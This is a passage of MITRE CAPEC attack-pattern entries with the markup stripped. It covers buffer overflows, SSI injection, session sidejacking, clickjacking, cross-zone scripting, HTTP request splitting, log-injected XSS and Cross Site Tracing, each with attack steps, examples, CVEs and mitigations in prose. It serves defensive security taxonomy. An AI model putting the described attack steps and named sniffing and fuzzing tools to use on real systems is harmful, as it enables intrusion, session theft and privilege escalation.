Having done so, any direct access to those protected Servlets will be prohibited by the web container.
In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
285
Targeted
732
Targeted
276
Targeted
693
Targeted
721
Targeted
434
Targeted
1000
Attack Pattern
ChildOf
122
All resources must be constrained to be inaccessible by default followed by selectively allowing access to resources as dictated by application and business logic
In addition to a central controller, every resource must also restrict, wherever possible, incoming accesses as dictated by the relevant ACL.
Failing Securely
Least Privilege
Reluctance To Trust
Complete Mediation
Use Authorization Mechanisms Correctly
Design Configuration Subsystems Correctly and Distribute Safe Default Configurations
Penetration
High
Medium
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
The attacker tries to find an environment variable which can be overwritten for instance by gathering information about the target host (error pages, software's version number, etc.).
The attacker manipulates the environment variable to contain excessive-length content to cause a buffer overflow.
The attacker potentially leverages the buffer overflow to inject maliciously crafted code in an attempt to execute privileged command on the target environment.
The application uses environment variables.
An environment variable exposed to the user is vulnerable to a buffer overflow.
The vulnerable environment variable uses untrusted data.
Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer.
High
High
Injection
Attack Example: Buffer Overflow in $HOME
A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable.
CVE-1999-0906
Attack Example: Buffer Overflow in TERM
A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable.
CVE-1999-0046
Low
An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.
High
Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.
While interacting with a system an attacker would typically investigate for environment variables that can be overwritten. The more a user knows about a system the more likely she will find a vulnerable environment variable.
On a web environment, the attacker can read the client side code and search for environment variables that can be overwritten.
There are tools such as Sharefuzz [R.10.3] which is an environment variable fuzzer for Unix that supports loading a shared library. Attackers can use such tools to uncover a buffer overflow in an environment variable.
If the application does bound checking, it should fail when the data source is larger than the size of the destination buffer. If the application's code is well written, that failure should trigger an alert.
Do not expose environment variable to the user.
Do not use untrusted data in your environment variables.
Use a language or compiler that performs automatic bounds checking
There are tools such as Sharefuzz [R.10.3] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.
Availability
DoS: crash / exit / restart
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read memory
Integrity
Modify memory
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
The user modifiable environment variable.
User supplied data potentially containing malicious code.
When the subroutine which uses the environment variable returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code.
The most common is remote code execution.
120
Targeted
302
Targeted
118
Targeted
119
Targeted
74
Targeted
99
Targeted
20
Targeted
680
Targeted
733
Secondary
697
Targeted
1000
Attack Pattern
ChildOf
77
1000
Attack Pattern
ChildOf
100
333
Category
HasMember
340
Reluctance to trust
Bound checking should be performed when copying data to a buffer.
Penetration
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-119: Buffer Errors
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/119.html
Sharefuzz
http://sharefuzz.sourceforge.net
CAPEC Content Team
The MITRE Corporation
2014-06-23
Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
The attacker identifies a buffer to target. Buffer regions are either allotted on the stack or the heap, and the exact nature of attack would vary depending on the location of the buffer
Next, the attacker identifies an injection vector to deliver the excessive content to the targeted buffer.
The attacker crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the attacker will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the attackers' choosing which points to code injected by the attacker.
The attacker injects the content into the targeted software.
Upon successful exploitation, the system either crashes or control of the program is returned to a location of the attackers' choice. This can result in execution of arbitrary code or escalated privileges, depending upon the exploited target.
Targeted software performs buffer operations.
Targeted software inadequately performs bounds-checking on buffer operations.
Attacker has the capability to influence the input to buffer operations.
Very High
High
Injection
Analysis
The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.
Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an attacker not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process.
Low
In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content.
High
In cases of directed overflows, where the motive is to divert the flow of the program or application as per the attackers' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.
None: Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system.
The attacker sends an overly long input in variables under his control. If the target system or application handles it gracefully, the attack becomes difficult. However, an error condition or a system crash point to a high likelihood of successful exploitation.
In cases where the attack is directed at a particular system or application, such as an operating system or a web server, the attacker can refer to system architecture and design documentation to figure out the exact point of injection and exploitation.
An attack designed to leverage a buffer overflow and redirect execution as per the attackers' bidding is fairly difficult to detect. An attack aimed solely at bringing the system down is usually preceded by a barrage of long inputs that make no sense. In either case, it is likely that the attacker would have resorted to a few hit-or-miss attempts that will be recorded in the system event logs, if they exist.
A buffer overflow attack itself is pretty difficult to obfuscate. There, however, exist fairly advanced techniques to obfuscate the payload, in order to bypass an intrusion detection system or filtering, either in the application or by means of an application firewall of some sorts.
Use a language or compiler that performs automatic bounds checking.
Use secure functions not vulnerable to buffer overflow.
If you have to use dangerous functions, make sure that you do boundary checking.
Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.
Use OS-level preventative functionality. Not a complete solution.
Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software.
Availability
DoS: crash / exit / restart
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
A buffer overflow attack is an injection-driven attack with the payload delivered via user-controllable input. Any input that an adversary can control is a potential injection point if that input is not validated and is subsequently used in a vulnerable buffer-related operation.
The payload for a buffer overflow attack is an overly long input string, often containing system shell code or commands.
Buffer allocated in memory for the input that carried the payload.
Denial of service, escalated privileges, execution of arbitrary code, including system commands and low-level assembly code.
120
Targeted
119
Secondary
131
Targeted
129
Targeted
805
Targeted
19
Secondary
680
Targeted
CVE-2007-2139
Multiple stack-based buffer overflows in the SUN RPC service in CA (formerly Computer Associates) BrightStor ARCserve Media Server, as used in BrightStor ARCserve Backup 9.01 through 11.5 SP2, BrightStor Enterprise Backup 10.5, Server Protection Suite 2, and Business Protection Suite 2, allow remote attackers to execute arbitrary code via malformed RPC strings.
CVE-2007-1910
Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document
1000
Attack Pattern
CanPrecede
24
1000
Attack Pattern
ChildOf
123
333
Category
HasMember
340
All user-controllable input must be strictly validated for enforcement of length and semantic checks
All exception conditions (such as ArrayIndexOutOfBounds) in applications must be gracefully handled through use of available exception handling mechanisms.
All applications and processes must be run with minimum privileges necessary so as to avoid an escalation of privilege in case of a successful exploit.
Reluctance To Trust
Defense in Depth
Failing Securely
Ensure that the Bounds of No Memory Region Are Violated
Never Use Unvalidated Input as Part of a Directive to any Internal Component
Penetration
Exploitation
High
High
High
All
All
AJAX
C
C++
PERL
PHP
Ruby
Visual Basic
Other
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
Determine applicability
The attacker determines whether server side includes are enabled on the target web server.
Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled.
env-Web
Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it.
env-Web
If .htaccess files are used, their contents should be checked for "Options Includes" or "Options IncludesNOEXEC".
env-Web
If apache is used, the contents of the httpd.conf file and similar configuration files should be checked for "Options Includes" or "Options IncludesNOEXEC".
env-Web
IIS configurations contain server-side include compatibility.
env-Web
Web pages that include mundane, but dynamic information (like the current date, a file's size, or some other data that SSI can produce) might be producing that content through SSI.
env-Web
Adding "AllowOverrides none" to the main httpd.conf file on an server (and the similar restrictions in other application servers) can prevent unexpected loosening of SSI functionality, even by internal developers.
Attempt SSI
Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
env-Web
URL parameters are used.
env-Web
No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided.
env-Web
A list of URLs, with their corresponding parameters is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Inject SSI
The attacker may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the attacker
The attacker views data (perhaps from a file) that he normally should not see.
The attacker executes a command on the server, or influences the arguments to a command executed via SSI on the server.
A web server that supports server side includes and has them enabled
User controllable input that can carry include directives to the web server
High
Very High
It is fairly easy to determine whether server-side includes are permitted on the target server. An attacker can potentially glean a lot of information if SSI Injection were found to be possible.
Injection
Protocol Manipulation
Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the "Options Includes" directive enabled.
Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.
When these logs are eventually reviewed, the server parses the SSI directives and executes them.
Medium
The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed.
None: Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed.
The attacker can probe for enabled SSI by injecting content that can be interpreted as SSI directives and viewing the page output
Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them
All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive
Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead
Confidentiality
Read application data
Read files or directories
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
User controllable input
SSI directives that can cause disclosure of file contents or execution of commands
The web server that parses and executes SSI directives before rendering the HTML page
The SSI directives cause the inclusion of certain file's contents or the execution of a shell command, as directed by the attacker
97
Targeted
74
Secondary
20
Secondary
713
Secondary
1000
Attack Pattern
ChildOf
253
Reluctance To Trust
Complete Mediation
Never Use Unvalidated Input as Part of a Directive to any Internal Component
Penetration
Exploitation
High
High
High
Client-Server
SOA
All
All
All
PHP
CAPEC Content Team
The MITRE Corporation
2014-06-23
Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim.
This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.
Detect Unprotected Session Token Transfer
The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.
The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies his knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens.
env-Web
The attacker and the victim are both on the same WiFi network.
env-Web env-ClientServer
Traffic between the victim and targeted application is unencrypted.
env-Web env-ClientServer
The attacker sees session tokens in the unencrypted traffic
Capture session token
The attacker uses sniffing tools to capture a session token from traffic.
Insert captured session token
The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation.
Session Token Exploitation
The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.
Utilize end to end encrypted communication via a secure tunneling protocol between the victim and the target system.
An attacker and the victim are both using the same WiFi network.
The victim has an active session with a target system.
The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)
The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically "rings home" asynchronously using the session token
High
High
Time and State
Analysis
Spoofing
Protocol Manipulation
The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, he has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but his e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account.
Low
Easy to use tools exist to automate this attack.
Low: A laptop and access to a public WiFi network.
Use available tools to snoop on communications between the victim and the target system and try to capture the transmitted session token
Use the captured session token to impersonate the victim on the target system to perform actions and view information on their behalf.
Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.
Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify memory
Confidentiality
Read memory
Availability
DoS: crash / exit / restart
DoS: instability
294
Targeted
522
Targeted
523
Targeted
319
Targeted
614
Secondary
1000
Attack Pattern
ChildOf
21
Ensure that SSL is used for all communication between the client and the target system where sensitive data and/or operations are available.
Ensure that session cookies are only transmitted via SSL pipes by setting the cookie's secure attribute to true.
Protect Sensitive Data in Transit
Exploitation
High
High
Low
Client-Server
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
In a clickjacking attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers' malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks he's clicking on versus what he or she is actually clicking on.
Craft a clickjacking page
The attacker utilizes web page layering techniques to try to craft a malicious clickjacking page
The attacker leveraged iframe overlay capabilities to craft a malicious clickjacking page
env-Web
The attacker leveraged Flash file overlay capabilities to craft a malicious clickjacking page
env-Web
The attacker leveraged Silverlight overlay capabilities to craft a malicious clickjacking page
env-Web
The attacker leveraged cross-frame scripting to craft a malicious clickjacking page
env-Web
Overlay capabilities are enabled in the browser
env-Web
A page is created that performs unseen actions when the user interacts with the visible UI
Disable overlay functionality in the browser. This can have obvious impact on the utility of the browser with some sites and web applications.
Attacker lures victim to clickjacking page
Attacker utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas.
Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site.
env-Web
Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim.
env-Web
Lure the victim to the malicious site through a cross-site scripting attack.
env-Web
The victim loads the clickjacking page.
Trick victim into interacting with the clickjacking page in the desired manner
The attacker tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.
Hide action controls over very commonly used functionality.
env-Web
Hide action controls over very psychologically tempting content.
env-Web
The victim is communicating with the target application via a web based UI and not a thick client
The victim's browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.
The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)
The victim has an active session with the target system.
The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system
High
Medium
Spoofing
Social Engineering
A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which he or she subscribes with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.
In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an attacker's account. Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service.
High
Crafting the proper malicious site and luring the victim to this site are not trivial tasks.
Low: A computer connected to the internet.
If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.
Turn off JavaScript, Flash and disable CSS.
When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify application data
Modify files or directories
Modify memory
Confidentiality
Read application data
Read memory
Read files or directories
Availability
DoS: crash / exit / restart
DoS: instability
693
Targeted
1000
Attack Pattern
ChildOf
173
Enforce maximum security restrictions in the browser: JavaScript disabled, Flash disabled, CSS disabled, iFrames forbidden
Shed elevated privileges as soon as possible (i.e. log out of the target application once finished with it and before doing other things in the browser)
Exploitation
High
High
Low
Client-Server
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.
Find systems susceptible to the attack
Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone.
Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place.
env-Web
Ensure standard system configurations do not enable shared functionality between internet and local zones
Find the insertion point for the payload
The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user's browser needs to be within the local machine zone.
Finding weaknesses in functionality used by both privileged and unprivileged users.
env-Web
Craft and inject the payload
Develop the payload to be executed in the higher privileged zone in the user's browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload.
The attacker makes it as likely as possible that the vulnerable functionality into which he has injected the payload has a high likelihood of being used by the victim.
env-Web
Leverage cross-site scripting vulnerability to inject payload.
env-Web
The target must be using a zone-aware browser.
High
Medium
Analysis
Injection
There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the "add video to chat" feature on attacker's video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. "Add video to chat" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed).
Medium
Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality
No specialized equipment is needed
Disable script execution.
Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone
Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone
Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum
Ensure proper HTML output encoding before writing user supplied data to the page
Integrity
Modify application data
Modify files or directories
Modify memory
Confidentiality
Read application data
Read files or directories
Read memory
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
250
Targeted
638
Targeted
285
Targeted
116
Secondary
20
Secondary
1000
Category
ChildOf
233
Enforce least privilege
Reluctance to trust
Exploitation
High
High
High
n-Tier
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
HTTP Request Splitting (also known as HTTP Request Smuggling) is an attack pattern where an attacker attempts to insert additional HTTP requests in the body of the original (enveloping) HTTP request in such a way that the browser interprets it as one request but the web server interprets it as two.
There are several ways to perform HTTP request splitting attacks. One way is to include double Content-Length headers in the request to exploit the fact that the devices parsing the request may each use a different header. Another way is to submit an HTTP request with a "Transfer Encoding: chunked" in the request header set with setRequestHeader to allow a payload in the HTTP Request that can be considered as another HTTP Request by a subsequent parsing entity. A third way is to use the "Double CR in an HTTP header" technique. There are also a few less general techniques targeting specific parsing vulnerabilities in certain web servers.
Investigate Target Environment
Determine the technologies used in the target environment such as types of browsers, web servers, application firewalls, proxies, etc.
Investigation of the target environment to determine the types of technologies used to parse the incoming HTTP requests. Attempt to understand how HTTP Request headers are parsed
env-Web
Post a malicious HTTP Request
Post a malicious HTTP request that will be interpreted as multiple HTTP requests when parsed on the server
Post a malicious HTTP Request utilizing double CR/LF characters in HTTP header to cause request splitting
env-Web
Post a malicious HTTP Request utilizing "Transfer Encoding: chunked" in the request header to cause request splitting
env-Web
Post a malicious HTTP Request utilizing double Content-Length headers to cause request splitting
env-Web
User-manipulateable HTTP Request headers are processed by the web server
High
Medium
Protocol Manipulation
Injection
Analysis
Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote attacker to conduct HTTP request splitting and smuggling attacks.
The vulnerability is due to an input validation error in the browser that allows attackers to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the attacker to bypass web application firewalls or other filtering devices.
Microsoft has confirmed the vulnerability and released software updates
Medium
Good understanding of the HTTP protocol and the parsing mechanisms employed by various web servers
Low: No specialized equipment is needed
Issue HTTP Requests against a target server and examine responses.
Make sure to install the latest vendor security patches available for the web server.
If possible, make use of SSL.
Install a web application firewall that has been secured against HTTP Request Splitting
Use web servers that employ a tight HTTP parsing process
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
Integrity
Modify application data
436
Targeted
444
Secondary
1000
Attack Pattern
ChildOf
220
333
Category
HasMember
357
System integration testing must include security checks to protect against Multiple Interpretation Errors across systems.
Economy of Mechanism
Secure the Weakest Link
Compartmentalization
Defense in Depth
Understand the possible underlying weaknesses in the third party technologies being used and stay up to date with the vendor patches.
Exploitation
Medium
Medium
Low
Client-Server
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
Probe for log injection vulnerability
The attacker probes all user-controllable data inputs to the system to probe for log injection vulnerabilities. This may be difficult (unless the attacker has a white box view of the system) because there may not be a feedback event to indicate to the attacker that certain information is being logged.
User injected input shows up in the logs
Apply appropriate input validation and filtering of user-controllable input before writing to logs
Probe for cross-site scripting vulnerability
The attacker probes all user-controllable data inputs to the system to probe for any cross-site scripting vulnerabilities. Cross-site scripting vulnerabilities identified anywhere in the application indicate an increased potential that such vulnerabilities may exist in the log management portions of the application.
Attacker-injected script is executed in user's browser.
HTML encode all log contents before displaying in log management interfaces.
Confirm exploitability
Create a simple script and inject it into one of the potentially vulnerable fields. This script should take some action which will give an attacker an indication that the attack vector exists.
The idea is to receive some sort of a feedback event that confirms that an attack is succeeding. That is done with a simple script prior to crafting possibly a more complex script to launch an actual attack.
env-Web
Expected script execution feedback event is observed.
Inject System Logs with Malicious Scripts
Create a malicious script to run in the administrator's web based interface and inject it in the system's logs through one of the user controlled fields that are being logged.
Inject the vulnerable fields by tampering with their values to contain the malicious scripts. Possibly trigger another event that makes it more likely that injected logs are viewed in the vulnerable UI as soon as possible.
env-Web
The system uses a web based interface
The system does not cleanse / validate user supplied data before writing it to logs
Information from logs is displayed in a web based interface
The web based log interface does not HTML output encode the log data prior to displaying it in the administrator console.
High
Medium
Injection
An attacker determines that a particular system uses a web based interface for administration. The attacker creates a new user record and supplies a malicious script in the user name field. The script will steal the administrator's authentication cookie and forward it to a site controlled by the attacker. The user name field is not validated by the system and is logged as is in the log. At some point later, an administrator reviews the log activity in the administrative console. When the administrator comes across the attackers' activity record, the malicious script is executed in the context of the attackers' browser, stealing the administrator's authentication cookie and forwarding it to the attacker. An attacker then uses the received authentication cookie to log in to the system as an administrator, assuming that the administrator console can be accessed remotely.
Low
Requires to ability to write a simple script and try to inject it through various user controlled fields in the system.
No specialized hardware is required
Locate system screens for operations that are likely to be logged and use these as starting points for injection
Cleanse all user supplied data before placing it in the logs. Reject all bad data. Ensure that the data is in the expected form.
Use proper HTML output encoding techniques to strip the log data of potentially dangerous scripting characters before displaying it in the administrative console
If possible, disable script execution in the administrative interface.
Confidentiality
Read application data
Read files or directories
Confidentiality
Authorization
Access_Control
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify memory
Modify files or directories
Modify application data
79
Targeted
117
Targeted
74
Secondary
20
Secondary
1000
Attack Pattern
ChildOf
93
Log injection attack pattern is one of the components of the current attack pattern
1000
Attack Pattern
ChildOf
63
Script injection attack pattern is one of the components of the current attack pattern
1000
Attack Pattern
ChildOf
18
HTML output encode all data prior to writing to an HTML page
Properly validate and cleanse/reject user supplied data before writing it to log files
Reluctance to Trust
Defense in Depth
Exploitation
High
High
Medium
Client-Server
n-Tier
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Cross Site Tracing (XST) enables an attacker to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to destination system's web server. The attacker first gets a malicious script to run in the victim's browser that induces the browser to initiate an HTTP TRACE request to the web server. If the destination web server allows HTTP TRACE requests, it will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. The function of HTTP TRACE, as defined by the HTTP specification, is to echo the request that the web server receives from the client back to the client. Since the HTTP header of the original request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the attackers' malicious site. XST becomes relevant when direct access to the session cookie via the "document.cookie" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST.
If the system with which the victim is interacting is susceptible to XSS, an attacker can exploit that weakness directly to get his or her malicious script to issue an HTTP TRACE request to the destination system's web server. In the absence of an XSS weakness on the site with which the victim is interacting, an attacker can get the script to come from the site that he controls and get it to execute in the victim's browser (if he can trick the victim's into visiting his malicious website or clicking on the link that he supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the attackers' malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An attacker will then need to find a way to exploit another weakness that would enable him or her to get around the same origin policy protection.
Determine if HTTP Trace is enabled
Determine if HTTP Trace is enabled at the web server with which the victim has a an active session
An attacker may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response.
env-Web
HTTP Trace is enabled on the web server
env-Web
The original request is returned after the HTTP Trace request.
Identify mechanism to launch HTTP Trace request
